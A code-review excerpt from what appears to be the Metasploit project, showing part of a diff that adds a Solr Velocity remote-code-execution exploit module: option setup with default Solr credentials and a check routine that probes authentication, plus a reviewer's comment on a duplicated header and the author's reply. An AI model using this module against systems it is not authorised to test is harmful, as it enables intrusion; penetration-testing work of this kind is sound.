modules/exploits/multi/http/solr_velocity_rce.rb

```diff
@@ -0,0 +1,404 @@
+                }
+              ]
+            ],
+        'DisclosureDate' => "Oct 29 2019",
+        'DefaultTarget'  => 0,
+        'Privileged'     => false
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8983),
+        OptString.new('USERNAME', [false, 'Solr username', 'solr']),
+        OptString.new('PASSWORD', [false, 'Solr password', 'SolrRocks'])
+      ]
+    )
+  end
+
+  # are we just checking? or are we exploiting?
+  @vuln_check = true
+  # if we are going to exploit, we only need one core to be exploitable
+  @core_name = ""
+  # OS specific stuff
+  @target_platform = ""
+  @target_arch = ""
+  # has the switch been flicked?
+  @params_resource_loader_enabled = false
+  # if authentication is used
+  @auth_string = ""
+
+  # check for vulnerability existence
+  def check
+    # see if authentication is required for the specified Solr instance
+    auth_check = send_request_cgi({
+                 'method'  => 'GET',
+                 'headers' => { 'Connection' => 'Keep-Alive' },
+                 'uri'     => '/solr/'
+      })
+
+    # successfully connected?
+    unless auth_check
+      return CheckCode::Unknown("Connection failed!")
+    end
+    # if return code is not 200, then the Solr instance definitely requires authentication
+    unless auth_check.code == 200
+      print_warning("Authentication required for #{peer}!")
+      vprint_warning("Server auth banner: #{auth_check['WWW-Authenticate']}")
+      # no creds provided means we cannot reliably check exploitability
+      if datastore['USERNAME'] == "" and datastore['PASSWORD'] == ""
+        return CheckCode::Unknown("Credentials not provided, skipping credentialed check...")
+      # otherwise, attempt authentication
+      else
+        print_status("Attempting authentication for #{peer}...")
+        attempt_auth = send_request_cgi({
+                       'method'  => 'GET',
+                       'headers' => {
+                                      'Connection'    => 'Keep-Alive',
+                                      'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+                                    },
+                       'uri'     => '/solr/'
+          })
+
+        # successfully connected?
+        unless attempt_auth
+          return CheckCode::Unknown("Connection failed!")
+        end
+        # if the return code is not 200, then authentication definitely failed
+        unless attempt_auth.code == 200
+          return CheckCode::Unknown('Authentication failed!')
+        end
+
+        print_good("Authentication succeeded!")
+        @auth_string = basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+        # TODO: add creds to MSF database
+      end
+    end
+
+    # if successful authentication happens, user the authorization header for the rest of the check
+    if @auth_string == ""
+      @headers = {
+        'Connection'   => 'Keep-Alive',
```

Comment:
`'Connection'   => 'Keep-Alive',` appears in both branches of the conditional. Unnecessary.

Reply:
Aye. Kicked in commit daae0886fa2080113de149c45eceb478c6b9ad29